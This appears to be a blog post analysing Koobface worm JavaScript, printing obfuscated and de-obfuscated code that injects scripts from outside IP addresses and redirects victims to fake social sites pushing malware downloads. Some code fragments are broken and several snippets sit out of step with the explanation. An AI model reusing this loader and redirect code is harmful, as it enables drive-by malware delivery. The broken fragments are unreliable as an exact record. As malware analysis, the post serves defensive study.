And here is my version of it (I de-obfuscated most of it):
// KROTEG var pwdfqiyjsclgezbrt9 = [ ['', 'fb2'], ['', 'tg'], ['','fr'], ['', 'ms'], ['', 'ms'], ['', 'ms'], ['','yb'], ['', 'fu'], ['', 'tw'], ['', 'hi5'], ['', 'be'] ]; var fomqnzlcd1 = [ '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']; var sxhidbqvre1 = '', xbujdriqngovtsz3 = '', psgyket3 = '', svzlnruwojfhi7 = ''; var zkglq4 = '' + eval('doc'+sxhidbqvre1+'ume'+xbujdriqngovtsz3+'nt.r'+psgyket3+'efer'+svzlnruwojfhi7+'rer'), ygepvbrakftloqmhwc6 = ''; for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < pwdfqiyjsclgezbrt9.length; nilhfdopsrx7 ++) { if ((zkglq4.indexOf(pwdfqiyjsclgezbrt9[nilhfdopsrx7][0]) != -1)) { ygepvbrakftloqmhwc6 = '/f=' + pwdfqiyjsclgezbrt9[nilhfdopsrx7][1]; break; } } window.redirect = ''; function urocwfkgdsjq6() { var higeruoxzcnqsbad9 = '' + window.redirect; if (higeruoxzcnqsbad9.length > 0) window.location.href = higeruoxzcnqsbad9; else setTimeout('urocwfkgdsjq6()', 50); } urocwfkgdsjq6(); var js = '/view'; var n = location.href.indexOf('?id='); if (n != -1) { n = parseInt(location.href.substr(n + 4)); if (n < 101) js = '/cnet'; else if (n < 201) js = '/warn'; else if (n < 301) js = '/scan'; else if (n < 401) js = ''; } for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < fomqnzlcd1.length; nilhfdopsrx7 ++) { var onjrmgcaifxsqtzb9 = document.createElement('script'); onjrmgcaifxsqtzb9.type = 'text/javascript'; onjrmgcaifxsqtzb9.src = 'http://' + fomqnzlcd1[nilhfdopsrx7] + '/go' + '.js' + '?0x3' + 'E8' + ygepvbrakftloqmhwc6 + js + '/' + ( > 0 ? : ''); document.getElementsByTagName('head')[0].appendChild(onjrmgcaifxsqtzb9); }
De-Obfuscated Javascript
Ok, now to go through it step by step (I am going to assume you have some experience with javascript).// KROTEG var referrers = [ ['', 'fb2'], ['', 'tg'], ['','fr'], ['', 'ms'], ['', 'ms'], ['', 'ms'], ['','yb'], ['', 'fu'], ['', 'tw'], ['', 'hi5'], ['', 'be'] ]; var ipAddresses = [ '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']; var docReferrer = '' + eval('document.referrer'), newPath = ''; for (var i = 0; i < referrers.length; i ++) { if ((docReferrer.indexOf(referrers[i][0]) != -1)) { newPath = '/f=' + referrers[i][1]; break; } } window.redirect = ''; function WaitForRedirect() { var currRedirect = '' + window.redirect; if (currRedirect.length > 0) window.location.href = currRedirect; else setTimeout('WaitForRedirect()', 50); } WaitForRedirect(); var js = '/view'; var n = location.href.indexOf('?id='); if (n != -1) { n = parseInt(location.href.substr(n + 4)); if (n < 101) js = '/cnet'; else if (n < 201) js = '/warn'; else if (n < 301) js = '/scan'; else if (n < 401) js = ''; } for (var i = 0; i < ipAddresses.length; i ++) { var scriptTag = document.createElement('script'); scriptTag.type = 'text/javascript'; scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + ( > 0 ? : ''); document.getElementsByTagName('head')[0].appendChild(scriptTag); }
The first thing this script does is get the referrer here:
Then the script tries to find a domain in its referrers array that is found in the docReferrer variable. If it finds one that matches, it sets the newPath variable to /f=<referrer abbreviation>
var docReferrer = '' + eval('document.referrer'), newPath = '';
Matching the referrrer
The next thing the script does is set window.redirect to "" (window.redirect = '';). Then it defines a function that uses setTimeout() to periodically (and semi-asynchronously) check window.redirect to see if there is any data stored there. If there is, the window.location.href is set to the window.redirect variable, redirecting the browser to the new location. This is shown below:
for (var i = 0; i < referrers.length; i ++) { if ((docReferrer.indexOf(referrers[i][0]) != -1)) { newPath = '/f=' + referrers[i][1]; break; } }
WaitForRedirect() function
After making the initial call to the WaitForRedirect() function, the script sets the variable js to one of /view, /cnet, /warn, /scan or blank (''), based on the id number of your account on any one of the social networking sites koobface targets. The way it does this isn't very straightforward. First, it looks for the "?id=" substring in the href:
window.redirect = ''; function WaitForRedirect() { var currRedirect = '' + window.redirect; if (currRedirect.length > 0) window.location.href = currRedirect; else setTimeout('WaitForRedirect()', 50); } WaitForRedirect();
var n = location.href.indexOf('?id=');
if (n != -1) {
n = parseInt(location.href.substr(n + 4));
The last thing the script does is append a new script tag to the DOM head for each ip in its ipAddresses array:
New javascript for each ip
This is done in case one of the ips is taken out or stops working. The first script to get loaded assigns the window.redirect variable to a new value. This can be seen in the source of one of the scripts: (At the time of this writing, the ip was up and working)
for (var i = 0; i < ipAddresses.length; i ++) { var scriptTag = document.createElement('script'); scriptTag.type = 'text/javascript'; scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + ( > 0 ? : ''); document.getElementsByTagName('head')[0].appendChild(scriptTag); }
Second script content
Note that the /f=fb2/cnet/ part of the the string being assigned to window.redirect will change based on what site you were on when you clicked the link, as well as what the id= url-param was.window.redirect='h t t p://'+location.hostname+'/0x3E8/f=fb2/cnet/';
Remember that WaitForRedirect() function we explained earlier and how it periodically checks for a non-blank string in the window.redirect variable? Once the second script assigns a non-blank string to that variable, the WaitForRedirect() function will redirect the browser to the new url. From there, many different things may happen, but it looks like most of them are social networking site look-alikes that try and get you to run an executable that automatically starts downloading.
Well, that's about it for tonight :)